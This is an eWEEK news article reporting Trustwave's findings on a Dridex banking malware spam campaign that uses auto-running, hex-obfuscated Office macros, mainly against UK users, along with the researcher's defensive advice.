Dridex Banking Malware Abuses Microsoft Office Macros to Infect Users

The attacks, largely against users in the United Kingdom, are leveraging macros in Microsoft Office documents to infect users.

Dridex banking malware

The Dridex banking malware is being used in a malicious spam campaign that is generating 15,000 emails a day, according to security firm Trustwave. The attacks, largely against users in the United Kingdom, are leveraging macros in Microsoft Office documents to infect users.

The way the attack works is that a user receives an infected Office document that includes a macro that triggers a download of the Dridex banking malware. Dridex steals user banking information and attempts to generate fraudulent financial transactions.

So far, Trustwave has not yet identified the group behind the new Dridex attack.

"We have been tracking the spambot behind it, and it is notorious for sending other malicious spam attacks that lead to Trojan Downloader infections and exploit kits," Rodel Mendrez, a security researcher at Trustwave, told eWEEK. "We have not given the campaign a name."

While there was a peak of almost 15,000 malicious macro document spam messages sent per day, the actual number of user infections is difficult to determine with certainty, Mendrez said.

"It is hard to tell the number of infections because the payload malware must be triggered by opening and enabling the macro in Office," Mendrez explained.

Trustwave maintains spam traps that act like mail servers, and the Trustwave Secure Email Gateway is able to detect the spam. Mendrez added that the potential victims are most likely customers or anyone who deals with the businesses that the cyber-criminals are mimicking.

The Dridex campaign is leveraging a macro function known as "AutoOpen()" that can be triggered as soon as a document file is opened. The actual Website location and malware that is opened by the macro is hidden by the attackers using what Trustwave refers to as a "text-to-hexadecimal" obfuscation in which the characters are converted into hexadecimal strings, for example, "http:" is converted to "687474703A."

The use of a document macro to deliver malware is an old idea in computer security that has seen a revival in the last year. Back in 1999 and 2000, macro viruses, including the ILOVEYOU and Melissa viruses, infected millions of users. Microsoft took steps in 2007 to limit the ability of macros in Microsoft Office, but attackers in 2014 still found ways to exploit users by way of macros. Multiple security vendors, including Sophos and Cisco, reported an increase in macro viruses in 2014.

Macros are disabled by default in Microsoft Office, and when a macro is present in the document, users are notified by the software before anything is loaded, Mendrez explained. The group behind the malicious Dridex spam campaign is using social engineering tactics in hopes that a small number of people will open the malicious document and enable the macro manually.

While up-to-date antivirus software is always a good idea, attackers are constantly modifying malware to make it undetectable.

"The best protection for this is to avoid opening email attachments and disable the macro feature in Microsoft Office," Mendrez said. "I believe the group behind the attack will still continue to use macros as an infection vector in 2015."

Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com. Follow him on Twitter @TechJournalist.

Sean Michael Kerner

Sean Michael Kerner

Sean Michael Kerner is an Internet consultant, strategist, and contributor to several leading IT business web sites.